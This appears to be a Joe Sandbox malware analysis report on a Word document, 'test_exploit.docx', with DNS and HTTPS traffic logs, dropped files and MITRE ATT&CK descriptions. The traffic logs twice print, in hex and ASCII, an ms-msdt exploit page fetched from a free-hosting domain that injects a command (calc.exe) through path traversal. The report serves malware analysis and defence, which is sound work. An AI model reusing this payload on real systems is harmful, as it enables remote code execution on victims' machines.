Jun 18, 2022 17:00:04.915551901 CEST	8.8.8.8	192.168.2.22	0x5bb	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:04.915551901 CEST	8.8.8.8	192.168.2.22	0x5bb	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.66	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:04.958412886 CEST	8.8.8.8	192.168.2.22	0xf829	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:04.958412886 CEST	8.8.8.8	192.168.2.22	0xf829	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.40	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:09.554107904 CEST	8.8.8.8	192.168.2.22	0xf2ca	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:09.554107904 CEST	8.8.8.8	192.168.2.22	0xf2ca	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.66	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:09.585844040 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:09.585844040 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.40	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:13.326579094 CEST	8.8.8.8	192.168.2.22	0xa86e	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:13.326579094 CEST	8.8.8.8	192.168.2.22	0xa86e	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.66	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:13.512608051 CEST	8.8.8.8	192.168.2.22	0xdfe0	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:00:13.512608051 CEST	8.8.8.8	192.168.2.22	0xdfe0	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.145.222	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

samisoooo.000webhostapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 14:59:59 UTC	0	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	145.14.144.66	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:05 UTC	0	OUT	HEAD /exp.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com
2022-06-18 15:00:05 UTC	0	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: d0e9dfc5fc6b409b547212a5a8940fef

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49181	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:15 UTC	6	OUT	HEAD /exp.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive
2022-06-18 15:00:16 UTC	6	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: eeb776a6b4d8f7ce1d4166e572d1daf5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	145.14.144.66	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:09 UTC	0	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: samisoooo.000webhostapp.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:10 UTC	0	OUT	GET /exp.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:00:10 UTC	1	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 2de54bda985b2f8dbf7467675cf75a99
2022-06-18 15:00:10 UTC	1	IN	Data Raw: 35 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 73 2d 6d 73 64 74 3a 2f 69 64 20 50 43 57 44 69 61 67 6e 6f 73 74 69 63 20 2f 73 6b 69 70 20 66 6f 72 63 65 20 2f 70 61 72 61 6d 20 5c 22 49 54 5f 52 65 62 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 63 61 6c 63 3f 63 20 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 4d 65 6e 75 20 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 68 24 28 63 61 6c 63 2e 65 78 65 29 29 27 29 29 29 29 69 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f Data Ascii: 532<!DOCTYPE html><html><head></head><body><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../
2022-06-18 15:00:10 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:11 UTC	2	OUT	HEAD /exp.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive
2022-06-18 15:00:11 UTC	2	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: d54c226c8c2faa9bdf29c6b8bc245661

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49176	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:12 UTC	3	OUT	HEAD /exp.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive
2022-06-18 15:00:12 UTC	3	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 863b2d3f7d77973781580decc1ccf042

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49177	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:13 UTC	3	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49178	145.14.144.66	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:13 UTC	3	OUT	HEAD /exp.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com
2022-06-18 15:00:14 UTC	3	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: ada7538f226a65657584211e15a404ba

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49179	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:14 UTC	3	OUT	GET /exp.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:00:14 UTC	4	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 91ffb51b9368f22c8f25a1b6e89a6a21
2022-06-18 15:00:14 UTC	4	IN	Data Raw: 35 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 73 2d 6d 73 64 74 3a 2f 69 64 20 50 43 57 44 69 61 67 6e 6f 73 74 69 63 20 2f 73 6b 69 70 20 66 6f 72 63 65 20 2f 70 61 72 61 6d 20 5c 22 49 54 5f 52 65 62 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 63 61 6c 63 3f 63 20 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 4d 65 6e 75 20 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 68 24 28 63 61 6c 63 2e 65 78 65 29 29 27 29 29 29 29 69 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f Data Ascii: 532<!DOCTYPE html><html><head></head><body><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../
2022-06-18 15:00:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49180	145.14.144.188	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:00:15 UTC	5	OUT	HEAD /exp.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Content-Length: 0 Connection: Keep-Alive
2022-06-18 15:00:15 UTC	6	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:00:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 8be376a93d63660efff12d97bef81831

Target ID:	0
Start time:	17:00:14
Start date:	18/06/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f2b0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test_exploit.docx.vir

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{114CD8F4-726A-47E5-81BB-88D492C7D89F}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{57B17972-0969-4493-B3CE-7A59E2F01440}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exp[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B18D662.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\475C6E34.dat

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83FA24C0.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6A2553F.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E26B072-EAB3-41AA-AF89-735B4390C5D9}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3155A32-4109-4836-B85D-FBC05DE1F998}.tmp

C:\Users\user\AppData\Local\Temp\{87A0ADDF-EA5F-47F4-8528-A6B8AB0136F3}

C:\Users\user\AppData\Local\Temp\{D7DEA83B-46CD-4801-9593-7D8BD5CE2A97}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\test_exploit.docx.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$st_exploit.docx.docx

Static File Info

General

File Icon

Windows Analysis Report
test_exploit.docx.vir